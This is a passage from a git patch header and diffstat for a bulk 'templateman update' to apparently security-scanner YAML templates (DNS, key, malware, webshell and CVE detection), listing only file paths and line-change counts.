From 161b90353a69a478935323e6ecb087d95efde4e1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 14 Oct 2023 16:57:55 +0530 Subject: [PATCH] templateman update --- dns/azure-takeover-detection.yaml | 2 +- dns/caa-fingerprint.yaml | 5 +- dns/detect-dangling-cname.yaml | 4 +- dns/dmarc-detect.yaml | 7 +- dns/dns-saas-service-detection.yaml | 5 +- dns/dns-waf-detect.yaml | 5 +- dns/dnssec-detection.yaml | 5 +- dns/ec2-detection.yaml | 4 +- dns/elasticbeanstalk-takeover.yaml | 3 +- dns/mx-fingerprint.yaml | 5 +- dns/mx-service-detector.yaml | 4 +- dns/nameserver-fingerprint.yaml | 5 +- dns/ptr-fingerprint.yaml | 5 +- dns/servfail-refused-hosts.yaml | 8 +- dns/spoofable-spf-records-ptr.yaml | 5 +- dns/txt-fingerprint.yaml | 5 +- dns/worksites-detection.yaml | 5 +- file/android/adb-backup-enabled.yaml | 5 +- file/android/biometric-detect.yaml | 4 +- file/android/certificate-validation.yaml | 2 - file/android/content-scheme.yaml | 4 +- file/android/debug-enabled.yaml | 2 - file/android/deep-link-detect.yaml | 3 +- file/android/dynamic-broadcast-receiver.yaml | 4 +- file/android/file-scheme.yaml | 4 +- file/android/google-storage-bucket.yaml | 3 +- file/android/provider-path.yaml | 2 - .../webview-addjavascript-interface.yaml | 2 - file/android/webview-javascript.yaml | 4 +- file/android/webview-load-url.yaml | 4 +- file/android/webview-universal-access.yaml | 2 - file/audit/cisco/configure-aaa-service.yaml | 5 +- .../configure-service-timestamps-debug.yaml | 5 +- ...figure-service-timestamps-logmessages.yaml | 5 +- file/audit/cisco/disable-ip-source-route.yaml | 5 +- file/audit/cisco/disable-pad-service.yaml | 5 +- .../enable-secret-for-password-user-and-.yaml | 3 +- file/audit/cisco/logging-enable.yaml | 5 +- .../audit/cisco/set-and-secure-passwords.yaml | 5 +- file/audit/fortigate/auto-usb-install.yaml | 3 +- file/audit/fortigate/heuristic-scan.yaml | 3 +- file/audit/fortigate/inactivity-timeout.yaml | 3 +- file/audit/fortigate/maintainer-account.yaml | 3 +- file/audit/fortigate/password-policy.yaml | 3 +- file/audit/fortigate/remote-auth-timeout.yaml | 3 +- file/audit/fortigate/scp-admin.yaml | 3 +- file/audit/fortigate/strong-ciphers.yaml | 1 - file/audit/pfsense/configure-dns-server.yaml | 3 +- .../pfsense/configure-session-timeout.yaml | 3 +- file/audit/pfsense/enable-https-protocol.yaml | 3 +- file/audit/pfsense/known-default-account.yaml | 3 +- .../password-protected-consolemenu.yaml | 3 +- file/audit/pfsense/set-hostname.yaml | 3 +- file/bash/bash-scanner.yaml | 1 - file/electron/electron-version-detect.yaml | 3 +- file/electron/node-integration-enabled.yaml | 5 +- file/js/js-analyse.yaml | 1 - file/keys/adafruit-key.yaml | 3 +- file/keys/adobe/adobe-client.yaml | 3 +- file/keys/adobe/adobe-secret.yaml | 3 +- file/keys/age/age-identity-secret-key.yaml | 3 +- file/keys/age/age-recipient-public-key.yaml | 3 +- file/keys/airtable-key.yaml | 3 +- file/keys/algolia-key.yaml | 3 +- file/keys/alibaba/alibaba-key-id.yaml | 3 +- file/keys/alibaba/alibaba-secret-id.yaml | 3 +- file/keys/amazon/amazon-account-id.yaml | 3 +- file/keys/amazon/amazon-mws-auth-token.yaml | 1 - file/keys/amazon/amazon-session-token.yaml | 3 +- file/keys/amazon/amazon-sns-token.yaml | 3 +- file/keys/amazon/aws-access-id.yaml | 3 +- file/keys/amazon/aws-cognito.yaml | 3 +- file/keys/asana/asana-clientid.yaml | 3 +- file/keys/asana/asana-clientsecret.yaml | 3 +- file/keys/atlassian/atlassian-api-token.yaml | 3 +- file/keys/azure/azure-connection-string.yaml | 1 - file/keys/beamer-api-token.yaml | 3 +- file/keys/bitbucket/bitbucket-client-id.yaml | 3 +- .../bitbucket/bitbucket-client-secret.yaml | 3 +- file/keys/bittrex/bittrex-access-key.yaml | 3 +- file/keys/bittrex/bittrex-secret-key.yaml | 3 +- file/keys/branch-key.yaml | 3 +- file/keys/clojars-api-token.yaml | 3 +- file/keys/cloudinary.yaml | 1 - file/keys/code-climate-token.yaml | 3 +- file/keys/codecov-access-token.yaml | 3 +- file/keys/coinbase-access-token.yaml | 3 +- .../confluent/confluent-access-token.yaml | 3 +- .../confluent/confluent-secret-token.yaml | 3 +- file/keys/contentful-api-token.yaml | 3 +- file/keys/cratesio-api-key.yaml | 3 +- file/keys/credential-exposure-file.yaml | 4125 ++++++++++++++--- file/keys/credentials.yaml | 1 - file/keys/databricks-api-token.yaml | 3 +- file/keys/datadog-access-token.yaml | 3 +- .../digitalocean-access-token.yaml | 3 +- .../digitalocean-personal-access.yaml | 3 +- .../digitalocean-refresh-token.yaml | 3 +- file/keys/discord/discord-api-token.yaml | 3 +- file/keys/discord/discord-cilent-secret.yaml | 3 +- file/keys/discord/discord-client-id.yaml | 3 +- file/keys/doppler-api-token.yaml | 3 +- file/keys/droneci-access-token.yaml | 3 +- file/keys/dropbox/dropbox-api-token.yaml | 3 +- .../keys/dropbox/dropbox-longlived-token.yaml | 3 +- .../dropbox/dropbox-shortlived-token.yaml | 3 +- file/keys/duffel-api-token.yaml | 3 +- file/keys/dynatrace-token.yaml | 1 - file/keys/easypost/easypost-api-token.yaml | 3 +- file/keys/easypost/easypost-test-token.yaml | 3 +- file/keys/etsy-access-token.yaml | 3 +- file/keys/facebook/facebook-api-token.yaml | 3 +- file/keys/facebook/facebook-client-id.yaml | 3 +- file/keys/facebook/facebook-secret.yaml | 1 - file/keys/facebook/fb-access-token.yaml | 3 +- file/keys/fastly-api-token.yaml | 3 +- file/keys/fcm-api-key.yaml | 3 +- file/keys/figma-access-token.yaml | 3 +- file/keys/finicity/finicity-api-token.yaml | 3 +- .../keys/finicity/finicity-client-secret.yaml | 3 +- file/keys/finnhub-access-token.yaml | 3 +- file/keys/firebase-database.yaml | 1 - file/keys/flickr-access-token.yaml | 3 +- .../flutter/flutterwave-encryption-key.yaml | 3 +- file/keys/flutter/flutterwave-public-key.yaml | 3 +- file/keys/flutter/flutterwave-secret-key.yaml | 3 +- file/keys/frameio-api-token.yaml | 3 +- file/keys/freshbooks-access-token.yaml | 3 +- file/keys/gcp-service-account.yaml | 1 - file/keys/github/github-app-token.yaml | 1 - file/keys/github/github-oauth-token.yaml | 1 - file/keys/github/github-outdated-key.yaml | 1 - file/keys/github/github-personal-token.yaml | 1 - file/keys/github/github-refresh-token.yaml | 1 - .../gitlab/gitlab-personal-accesstoken.yaml | 3 +- .../gitlab/gitlab-pipeline-triggertoken.yaml | 3 +- file/keys/gitlab/gitlab-runner-regtoken.yaml | 3 +- file/keys/gitter-access-token.yaml | 3 +- file/keys/gocardless-api-token.yaml | 3 +- file/keys/google/google-api.yaml | 1 - file/keys/google/google-clientid.yaml | 3 +- .../google/google-oauth-clientsecret.yaml | 3 +- file/keys/grafana/grafana-api-key.yaml | 3 +- .../keys/grafana/grafana-cloud-api-token.yaml | 3 +- .../grafana-service-account-token.yaml | 3 +- file/keys/hashicorp-api-token.yaml | 3 +- file/keys/heroku-key.yaml | 3 +- file/keys/jenkins-token.yaml | 3 +- file/keys/linkedin-id.yaml | 1 - file/keys/mailchimp-api.yaml | 1 - file/keys/mailgun-api.yaml | 1 - file/keys/mapbox-token.yaml | 1 - file/keys/newrelic/newrelic-pixie-apikey.yaml | 3 +- .../newrelic/newrelic-pixie-deploykey.yaml | 3 +- file/keys/npm-accesstoken.yaml | 1 - file/keys/nuget-key.yaml | 3 +- file/keys/openai-key.yaml | 1 - file/keys/paypal-braintree-token.yaml | 1 - file/keys/pictatic-api-key.yaml | 3 +- file/keys/postman-api-key.yaml | 1 - file/keys/private-key.yaml | 1 - file/keys/pypi-token.yaml | 3 +- file/keys/razorpay-client-id.yaml | 1 - file/keys/rubygems-key.yaml | 3 +- file/keys/s3-bucket.yaml | 1 - file/keys/sauce-access-token.yaml | 3 +- file/keys/segment-public-api.yaml | 3 +- file/keys/sendgrid-api.yaml | 1 - file/keys/shopify-custom-token.yaml | 3 +- file/keys/shopify-private-token.yaml | 3 +- file/keys/shopify-public-access.yaml | 3 +- file/keys/shopify-shared-secret.yaml | 3 +- file/keys/shopify-token.yaml | 3 +- file/keys/slack-api.yaml | 1 - file/keys/slack-webhook.yaml | 1 - file/keys/square-access-token.yaml | 1 - file/keys/square-oauth-secret.yaml | 1 - file/keys/stackhawk-api-key.yaml | 1 - file/keys/stripe-api-key.yaml | 1 - file/keys/telegram-token.yaml | 3 +- file/keys/twilio-api.yaml | 3 +- file/keys/twitter-secret.yaml | 3 +- file/keys/zapier-webhook.yaml | 1 - file/keys/zendesk-secret-key.yaml | 3 +- file/logs/django-framework-exceptions.yaml | 1 - file/logs/python-app-sql-exceptions.yaml | 3 +- .../ruby-on-rails-framework-exceptions.yaml | 1 - file/logs/spring-framework-exceptions.yaml | 1 - file/logs/suspicious-sql-error-messages.yaml | 3 +- file/malware/aar-malware.yaml | 4 +- file/malware/adzok-malware.yaml | 3 +- file/malware/alfa-malware.yaml | 2 - file/malware/alienspy-malware.yaml | 4 +- file/malware/alina-malware.yaml | 4 +- file/malware/alpha-malware.yaml | 2 - file/malware/andromeda-malware.yaml | 3 +- file/malware/ap0calypse-malware.yaml | 4 +- file/malware/arcom-malware.yaml | 3 +- file/malware/arkei-malware.yaml | 4 +- file/malware/backoff-malware.yaml | 4 +- file/malware/bandook-malware.yaml | 2 - file/malware/basicrat-malware.yaml | 4 +- file/malware/blacknix-malware.yaml | 2 - file/malware/blackworm-malware.yaml | 4 +- file/malware/bluebanana-malware.yaml | 2 - file/malware/bozok-malware.yaml | 4 +- file/malware/bublik-malware.yaml | 4 +- file/malware/cap-hookexkeylogger-malware.yaml | 3 +- file/malware/cerber-malware.yaml | 4 +- file/malware/cerberus-malware.yaml | 1 - file/malware/clientmesh-malware.yaml | 3 +- file/malware/crimson-malware.yaml | 2 - file/malware/crunchrat-malware.yaml | 4 +- file/malware/cryptxxx-dropper-malware.yaml | 4 +- file/malware/cryptxxx-malware.yaml | 4 +- file/malware/cxpid-malware.yaml | 3 +- file/malware/cythosia-malware.yaml | 4 +- file/malware/darkrat-malware.yaml | 2 - file/malware/ddostf-malware.yaml | 3 +- file/malware/derkziel-malware.yaml | 4 +- file/malware/dexter-malware.yaml | 4 +- file/malware/diamondfox-malware.yaml | 4 +- file/malware/dmalocker-malware.yaml | 2 - file/malware/doublepulsar-malware.yaml | 4 +- file/malware/eicar-malware.yaml | 4 +- file/malware/erebus-malware.yaml | 4 +- file/malware/ezcob-malware.yaml | 4 +- file/malware/fudcrypt-malware.yaml | 4 +- file/malware/gafgyt-bash-malware.yaml | 4 +- file/malware/gafgyt-generic-malware.yaml | 4 +- file/malware/gafgyt-hihi-malware.yaml | 4 +- file/malware/gafgyt-hoho-malware.yaml | 4 +- file/malware/gafgyt-jackmy-malware.yaml | 4 +- file/malware/gafgyt-oh-malware.yaml | 4 +- file/malware/genome-malware.yaml | 4 +- file/malware/glass-malware.yaml | 2 - file/malware/glasses-malware.yaml | 3 +- file/malware/gozi-malware.yaml | 4 +- file/malware/gpgqwerty-malware.yaml | 4 +- file/malware/greame-malware.yaml | 3 +- file/malware/grozlex-malware.yaml | 4 +- file/malware/hawkeye-malware.yaml | 2 - file/malware/hydracrypt-malware.yaml | 4 +- file/malware/imminent-malware.yaml | 3 +- file/malware/infinity-malware.yaml | 4 +- file/malware/insta11-malware.yaml | 3 +- .../malware/intel-virtualization-malware.yaml | 3 +- file/malware/iotreaper-malware.yaml | 3 +- file/malware/linux-aesddos-malware.yaml | 1 - file/malware/linux-billgates-malware.yaml | 2 - file/malware/linux-elknot-malware.yaml | 2 - file/malware/linux-mrblack-malware.yaml | 2 - file/malware/linux-tsunami-malware.yaml | 2 - file/malware/locky-malware.yaml | 3 +- file/malware/lostdoor-malware.yaml | 3 +- file/malware/luminositylink-malware.yaml | 4 +- file/malware/luxnet-malware.yaml | 4 +- file/malware/macgyver-installer-malware.yaml | 4 +- file/malware/macgyver-malware.yaml | 4 +- file/malware/macos-bella-malware.yaml | 3 +- file/malware/miner--malware.yaml | 4 +- file/malware/miniasp3-malware.yaml | 1 - file/malware/naikon-malware.yaml | 1 - file/malware/naspyupdate-malware.yaml | 3 +- file/malware/notepad-malware.yaml | 4 +- file/malware/olyx-malware.yaml | 1 - file/malware/osx-leverage-malware.yaml | 6 +- file/malware/paradox-malware.yaml | 4 +- file/malware/petya-malware-variant-1.yaml | 4 +- file/malware/petya-malware-variant-3.yaml | 4 +- .../petya-malware-variant-bitcoin.yaml | 4 +- file/malware/plasma-malware.yaml | 4 +- file/malware/poetrat-malware.yaml | 3 +- file/malware/pony-malware.yaml | 4 +- file/malware/pony-stealer-malware.yaml | 4 +- file/malware/powerware-malware.yaml | 4 +- file/malware/pubsab-malware.yaml | 3 +- file/malware/punisher-malware.yaml | 3 +- file/malware/pypi-malware.yaml | 4 +- file/malware/pythorat-malware.yaml | 2 - file/malware/qrat-malware.yaml | 1 - file/malware/satana-dropper-malware.yaml | 4 +- file/malware/satana-malware.yaml | 3 +- file/malware/shimrat-malware.yaml | 3 +- file/malware/shimratreporter-malware.yaml | 2 - file/malware/sigma-malware.yaml | 4 +- file/malware/smallnet-malware.yaml | 4 +- file/malware/snake-malware.yaml | 3 +- file/malware/sub7nation-malware.yaml | 2 - file/malware/t5000-malware.yaml | 4 +- file/malware/tedroo-malware.yaml | 4 +- file/malware/terminator-malware.yaml | 2 - file/malware/teslacrypt-malware.yaml | 2 - file/malware/tox-malware.yaml | 3 +- file/malware/treasurehunt-malware.yaml | 4 +- file/malware/trickbot-malware.yaml | 4 +- file/malware/trumpbot-malware.yaml | 4 +- file/malware/universal-1337-malware.yaml | 3 +- file/malware/unrecom-malware.yaml | 2 - file/malware/urausy-malware.yaml | 4 +- file/malware/vertex-malware.yaml | 2 - file/malware/virusrat-malware.yaml | 2 - file/malware/wabot-malware.yaml | 4 +- file/malware/wannacry-malware.yaml | 3 +- file/malware/warp-malware.yaml | 3 +- file/malware/xhide-malware.yaml | 4 +- file/malware/xor-ddos-malware.yaml | 4 +- file/malware/yayih-malware.yaml | 3 +- file/malware/zeghost-malware.yaml | 2 - file/malware/zoxpng-malware.yaml | 2 - file/malware/zrypt-malware.yaml | 3 +- file/nodejs/admzip-path-overwrite.yaml | 2 - file/nodejs/express-lfr.yaml | 2 - file/nodejs/generic-path-traversal.yaml | 4 +- file/nodejs/tar-path-overwrite.yaml | 4 +- file/nodejs/xss-disable-mustache-escape.yaml | 2 - file/nodejs/xss-serialize-javascript.yaml | 2 - file/nodejs/zip-path-overwrite.yaml | 2 - file/perl/perl-scanner.yaml | 29 +- file/php/php-scanner.yaml | 54 +- file/python/python-scanner.yaml | 1 - file/url-analyse/url-extension-inspector.yaml | 53 +- file/webshell/asp-webshell.yaml | 3 +- file/webshell/jsp-webshell.yaml | 3 +- file/webshell/php-webshell.yaml | 3 +- file/xss/dom-xss.yaml | 4 +- headless/dvwa-headless-automatic-login.yaml | 10 +- headless/extract-urls.yaml | 1 - headless/headless-open-redirect.yaml | 4 +- headless/prototype-pollution-check.yaml | 7 +- headless/screenshot.yaml | 5 +- headless/technologies/sap-spartacus.yaml | 1 - http/cnvd/2017/CNVD-2017-03561.yaml | 4 +- http/cnvd/2018/CNVD-2018-13393.yaml | 5 +- http/cnvd/2019/CNVD-2019-01348.yaml | 7 +- http/cnvd/2019/CNVD-2019-06255.yaml | 8 +- http/cnvd/2019/CNVD-2019-19299.yaml | 7 +- http/cnvd/2019/CNVD-2019-32204.yaml | 6 +- http/cnvd/2020/CNVD-2020-23735.yaml | 4 +- http/cnvd/2020/CNVD-2020-26585.yaml | 8 +- http/cnvd/2020/CNVD-2020-46552.yaml | 6 +- http/cnvd/2020/CNVD-2020-56167.yaml | 6 +- http/cnvd/2020/CNVD-2020-62422.yaml | 4 +- http/cnvd/2020/CNVD-2020-63964.yaml | 2 +- http/cnvd/2020/CNVD-2020-67113.yaml | 5 +- http/cnvd/2020/CNVD-2020-68596.yaml | 9 +- http/cnvd/2021/CNVD-2021-01931.yaml | 4 +- http/cnvd/2021/CNVD-2021-09650.yaml | 4 +- http/cnvd/2021/CNVD-2021-10543.yaml | 2 +- http/cnvd/2021/CNVD-2021-15822.yaml | 2 +- http/cnvd/2021/CNVD-2021-15824.yaml | 2 +- http/cnvd/2021/CNVD-2021-17369.yaml | 3 +- http/cnvd/2021/CNVD-2021-26422.yaml | 4 +- http/cnvd/2021/CNVD-2021-28277.yaml | 9 +- http/cnvd/2021/CNVD-2021-30167.yaml | 5 +- http/cnvd/2021/CNVD-2021-32799.yaml | 2 +- http/cnvd/2021/CNVD-2021-33202.yaml | 5 +- http/cnvd/2021/CNVD-2021-41972.yaml | 5 +- http/cnvd/2021/CNVD-2021-43984.yaml | 2 +- http/cnvd/2021/CNVD-2021-49104.yaml | 5 +- http/cnvd/2022/CNVD-2022-03672.yaml | 5 +- http/cnvd/2022/CNVD-2022-42853.yaml | 5 +- http/cnvd/2022/CNVD-2022-43245.yaml | 4 +- http/cnvd/2022/CNVD-2022-86535.yaml | 4 +- http/cnvd/2023/CNVD-2023-08743.yaml | 2 +- http/cnvd/2023/CNVD-2023-12632.yaml | 5 +- http/cnvd/2023/CNVD-C-2023-76801.yaml | 3 +- .../atechmedia-codebase-login-check.yaml | 91 +- .../cloud/atlassian-login-check.yaml | 3 +- .../cloud/avnil-pdf-generator-check.yaml | 3 +- .../cloud/chefio-login-check.yaml | 4 +- .../cloud/codepen-login-check.yaml | 8 +- .../cloud/datadog-login-check.yaml | 8 +- .../cloud/docker-hub-login-check.yaml | 4 +- .../cloud/gitea-login-check.yaml | 58 +- .../cloud/github-login-check.yaml | 131 +- .../cloud/postman-login-check.yaml | 86 +- .../cloud/pulmi-login-check.yaml | 64 +- .../gitlab-login-check-self-hosted.yaml | 6 +- .../self-hosted/grafana-login-check.yaml | 3 +- .../self-hosted/jira-login-check.yaml | 7 +- http/cves/2000/CVE-2000-0114.yaml | 2 +- http/cves/2001/CVE-2001-0537.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 2 +- http/cves/2004/CVE-2004-0519.yaml | 2 +- http/cves/2005/CVE-2005-2428.yaml | 2 +- http/cves/2005/CVE-2005-3344.yaml | 2 +- http/cves/2005/CVE-2005-3634.yaml | 2 +- http/cves/2005/CVE-2005-4385.yaml | 2 +- http/cves/2006/CVE-2006-1681.yaml | 2 +- http/cves/2006/CVE-2006-2842.yaml | 2 +- http/cves/2007/CVE-2007-0885.yaml | 2 +- http/cves/2007/CVE-2007-4504.yaml | 2 +- http/cves/2007/CVE-2007-4556.yaml | 4 +- http/cves/2007/CVE-2007-5728.yaml | 2 +- http/cves/2008/CVE-2008-1059.yaml | 2 +- http/cves/2008/CVE-2008-1061.yaml | 2 +- http/cves/2008/CVE-2008-1547.yaml | 2 +- http/cves/2008/CVE-2008-2398.yaml | 2 +- http/cves/2008/CVE-2008-2650.yaml | 2 +- http/cves/2008/CVE-2008-4668.yaml | 2 +- http/cves/2008/CVE-2008-4764.yaml | 4 +- http/cves/2008/CVE-2008-5587.yaml | 2 +- http/cves/2008/CVE-2008-6080.yaml | 4 +- http/cves/2008/CVE-2008-6172.yaml | 4 +- http/cves/2008/CVE-2008-6222.yaml | 4 +- http/cves/2008/CVE-2008-6465.yaml | 2 +- http/cves/2008/CVE-2008-6668.yaml | 2 +- http/cves/2008/CVE-2008-6982.yaml | 2 +- http/cves/2008/CVE-2008-7269.yaml | 2 +- http/cves/2009/CVE-2009-0347.yaml | 4 +- http/cves/2009/CVE-2009-0545.yaml | 4 +- http/cves/2009/CVE-2009-0932.yaml | 2 +- http/cves/2009/CVE-2009-1151.yaml | 2 +- http/cves/2009/CVE-2009-1496.yaml | 2 +- http/cves/2009/CVE-2009-1558.yaml | 4 +- http/cves/2009/CVE-2009-1872.yaml | 4 +- http/cves/2009/CVE-2009-2015.yaml | 2 +- http/cves/2009/CVE-2009-2100.yaml | 2 +- http/cves/2009/CVE-2009-3053.yaml | 2 +- http/cves/2009/CVE-2009-3318.yaml | 2 +- http/cves/2009/CVE-2009-4202.yaml | 2 +- http/cves/2009/CVE-2009-4223.yaml | 2 +- http/cves/2009/CVE-2009-4679.yaml | 2 +- http/cves/2009/CVE-2009-5020.yaml | 2 +- http/cves/2009/CVE-2009-5114.yaml | 2 +- http/cves/2010/CVE-2010-0157.yaml | 2 +- http/cves/2010/CVE-2010-0219.yaml | 4 +- http/cves/2010/CVE-2010-0467.yaml | 2 +- http/cves/2010/CVE-2010-0696.yaml | 4 +- http/cves/2010/CVE-2010-0759.yaml | 2 +- http/cves/2010/CVE-2010-0942.yaml | 2 +- http/cves/2010/CVE-2010-0943.yaml | 2 +- http/cves/2010/CVE-2010-0944.yaml | 2 +- http/cves/2010/CVE-2010-0972.yaml | 2 +- http/cves/2010/CVE-2010-0982.yaml | 2 +- http/cves/2010/CVE-2010-0985.yaml | 2 +- http/cves/2010/CVE-2010-1056.yaml | 2 +- http/cves/2010/CVE-2010-1081.yaml | 4 +- http/cves/2010/CVE-2010-1217.yaml | 2 +- http/cves/2010/CVE-2010-1219.yaml | 2 +- http/cves/2010/CVE-2010-1302.yaml | 2 +- http/cves/2010/CVE-2010-1304.yaml | 2 +- http/cves/2010/CVE-2010-1305.yaml | 2 +- http/cves/2010/CVE-2010-1306.yaml | 2 +- http/cves/2010/CVE-2010-1307.yaml | 2 +- http/cves/2010/CVE-2010-1308.yaml | 2 +- http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 2 +- http/cves/2010/CVE-2010-1314.yaml | 2 +- http/cves/2010/CVE-2010-1315.yaml | 2 +- http/cves/2010/CVE-2010-1340.yaml | 2 +- http/cves/2010/CVE-2010-1345.yaml | 2 +- http/cves/2010/CVE-2010-1352.yaml | 2 +- http/cves/2010/CVE-2010-1353.yaml | 2 +- http/cves/2010/CVE-2010-1354.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 2 +- http/cves/2010/CVE-2010-1461.yaml | 2 +- http/cves/2010/CVE-2010-1469.yaml | 2 +- http/cves/2010/CVE-2010-1470.yaml | 2 +- http/cves/2010/CVE-2010-1471.yaml | 2 +- http/cves/2010/CVE-2010-1472.yaml | 2 +- http/cves/2010/CVE-2010-1473.yaml | 2 +- http/cves/2010/CVE-2010-1474.yaml | 2 +- http/cves/2010/CVE-2010-1475.yaml | 2 +- http/cves/2010/CVE-2010-1476.yaml | 2 +- http/cves/2010/CVE-2010-1478.yaml | 2 +- http/cves/2010/CVE-2010-1491.yaml | 2 +- http/cves/2010/CVE-2010-1494.yaml | 2 +- http/cves/2010/CVE-2010-1495.yaml | 2 +- http/cves/2010/CVE-2010-1531.yaml | 2 +- http/cves/2010/CVE-2010-1532.yaml | 2 +- http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1534.yaml | 2 +- http/cves/2010/CVE-2010-1535.yaml | 2 +- http/cves/2010/CVE-2010-1540.yaml | 2 +- http/cves/2010/CVE-2010-1586.yaml | 4 +- http/cves/2010/CVE-2010-1601.yaml | 2 +- http/cves/2010/CVE-2010-1602.yaml | 2 +- http/cves/2010/CVE-2010-1603.yaml | 2 +- http/cves/2010/CVE-2010-1607.yaml | 2 +- http/cves/2010/CVE-2010-1653.yaml | 2 +- http/cves/2010/CVE-2010-1657.yaml | 2 +- http/cves/2010/CVE-2010-1658.yaml | 2 +- http/cves/2010/CVE-2010-1659.yaml | 2 +- http/cves/2010/CVE-2010-1714.yaml | 2 +- http/cves/2010/CVE-2010-1715.yaml | 2 +- http/cves/2010/CVE-2010-1717.yaml | 2 +- http/cves/2010/CVE-2010-1718.yaml | 2 +- http/cves/2010/CVE-2010-1719.yaml | 2 +- http/cves/2010/CVE-2010-1722.yaml | 2 +- http/cves/2010/CVE-2010-1723.yaml | 2 +- http/cves/2010/CVE-2010-1858.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 4 +- http/cves/2010/CVE-2010-1875.yaml | 2 +- http/cves/2010/CVE-2010-1878.yaml | 2 +- http/cves/2010/CVE-2010-1952.yaml | 2 +- http/cves/2010/CVE-2010-1953.yaml | 2 +- http/cves/2010/CVE-2010-1954.yaml | 2 +- http/cves/2010/CVE-2010-1955.yaml | 2 +- http/cves/2010/CVE-2010-1956.yaml | 2 +- http/cves/2010/CVE-2010-1957.yaml | 2 +- http/cves/2010/CVE-2010-1977.yaml | 2 +- http/cves/2010/CVE-2010-1979.yaml | 2 +- http/cves/2010/CVE-2010-1980.yaml | 2 +- http/cves/2010/CVE-2010-1981.yaml | 2 +- http/cves/2010/CVE-2010-1982.yaml | 2 +- http/cves/2010/CVE-2010-1983.yaml | 2 +- http/cves/2010/CVE-2010-2033.yaml | 2 +- http/cves/2010/CVE-2010-2034.yaml | 2 +- http/cves/2010/CVE-2010-2035.yaml | 2 +- http/cves/2010/CVE-2010-2036.yaml | 2 +- http/cves/2010/CVE-2010-2037.yaml | 2 +- http/cves/2010/CVE-2010-2045.yaml | 2 +- http/cves/2010/CVE-2010-2050.yaml | 2 +- http/cves/2010/CVE-2010-2122.yaml | 2 +- http/cves/2010/CVE-2010-2128.yaml | 2 +- http/cves/2010/CVE-2010-2259.yaml | 2 +- http/cves/2010/CVE-2010-2307.yaml | 2 +- http/cves/2010/CVE-2010-2507.yaml | 2 +- http/cves/2010/CVE-2010-2680.yaml | 2 +- http/cves/2010/CVE-2010-2682.yaml | 2 +- http/cves/2010/CVE-2010-2857.yaml | 2 +- http/cves/2010/CVE-2010-2861.yaml | 4 +- http/cves/2010/CVE-2010-2918.yaml | 2 +- http/cves/2010/CVE-2010-2920.yaml | 2 +- http/cves/2010/CVE-2010-3203.yaml | 2 +- http/cves/2010/CVE-2010-3426.yaml | 2 +- http/cves/2010/CVE-2010-4231.yaml | 2 +- http/cves/2010/CVE-2010-4239.yaml | 4 +- http/cves/2010/CVE-2010-4282.yaml | 2 +- http/cves/2010/CVE-2010-4617.yaml | 4 +- http/cves/2010/CVE-2010-4719.yaml | 2 +- http/cves/2010/CVE-2010-4769.yaml | 4 +- http/cves/2010/CVE-2010-4977.yaml | 4 +- http/cves/2010/CVE-2010-5028.yaml | 4 +- http/cves/2010/CVE-2010-5278.yaml | 2 +- http/cves/2010/CVE-2010-5286.yaml | 2 +- http/cves/2011/CVE-2011-0049.yaml | 2 +- http/cves/2011/CVE-2011-1669.yaml | 2 +- http/cves/2011/CVE-2011-2744.yaml | 2 +- http/cves/2011/CVE-2011-2780.yaml | 2 +- http/cves/2011/CVE-2011-3315.yaml | 2 +- http/cves/2011/CVE-2011-4336.yaml | 2 +- http/cves/2011/CVE-2011-4618.yaml | 2 +- http/cves/2011/CVE-2011-4624.yaml | 2 +- http/cves/2011/CVE-2011-4804.yaml | 4 +- http/cves/2011/CVE-2011-4926.yaml | 2 +- http/cves/2011/CVE-2011-5106.yaml | 4 +- http/cves/2011/CVE-2011-5107.yaml | 4 +- http/cves/2011/CVE-2011-5179.yaml | 2 +- http/cves/2011/CVE-2011-5181.yaml | 2 +- http/cves/2011/CVE-2011-5252.yaml | 2 +- http/cves/2011/CVE-2011-5265.yaml | 2 +- http/cves/2012/CVE-2012-0392.yaml | 2 +- http/cves/2012/CVE-2012-0394.yaml | 4 +- http/cves/2012/CVE-2012-0896.yaml | 2 +- http/cves/2012/CVE-2012-0901.yaml | 2 +- http/cves/2012/CVE-2012-0981.yaml | 4 +- http/cves/2012/CVE-2012-0991.yaml | 4 +- http/cves/2012/CVE-2012-0996.yaml | 4 +- http/cves/2012/CVE-2012-1226.yaml | 2 +- http/cves/2012/CVE-2012-1823.yaml | 4 +- http/cves/2012/CVE-2012-1835.yaml | 2 +- http/cves/2012/CVE-2012-2371.yaml | 4 +- http/cves/2012/CVE-2012-3153.yaml | 2 +- http/cves/2012/CVE-2012-4032.yaml | 4 +- http/cves/2012/CVE-2012-4242.yaml | 2 +- http/cves/2012/CVE-2012-4253.yaml | 4 +- http/cves/2012/CVE-2012-4273.yaml | 2 +- http/cves/2012/CVE-2012-4547.yaml | 2 +- http/cves/2012/CVE-2012-4768.yaml | 2 +- http/cves/2012/CVE-2012-4878.yaml | 4 +- http/cves/2012/CVE-2012-4889.yaml | 4 +- http/cves/2012/CVE-2012-4940.yaml | 4 +- http/cves/2012/CVE-2012-4982.yaml | 2 +- http/cves/2012/CVE-2012-5321.yaml | 2 +- http/cves/2012/CVE-2012-5913.yaml | 2 +- http/cves/2012/CVE-2012-6499.yaml | 2 +- http/cves/2013/CVE-2013-1965.yaml | 2 +- http/cves/2013/CVE-2013-2248.yaml | 4 +- http/cves/2013/CVE-2013-2251.yaml | 2 +- http/cves/2013/CVE-2013-2287.yaml | 2 +- http/cves/2013/CVE-2013-2621.yaml | 2 +- http/cves/2013/CVE-2013-3526.yaml | 2 +- http/cves/2013/CVE-2013-3827.yaml | 2 +- http/cves/2013/CVE-2013-4117.yaml | 2 +- http/cves/2013/CVE-2013-4625.yaml | 2 +- http/cves/2013/CVE-2013-5528.yaml | 4 +- http/cves/2013/CVE-2013-5979.yaml | 2 +- http/cves/2013/CVE-2013-6281.yaml | 2 +- http/cves/2013/CVE-2013-7091.yaml | 2 +- http/cves/2013/CVE-2013-7240.yaml | 4 +- http/cves/2013/CVE-2013-7285.yaml | 2 +- http/cves/2014/CVE-2014-10037.yaml | 2 +- http/cves/2014/CVE-2014-1203.yaml | 2 +- http/cves/2014/CVE-2014-2321.yaml | 2 +- http/cves/2014/CVE-2014-2323.yaml | 4 +- http/cves/2014/CVE-2014-2383.yaml | 2 +- 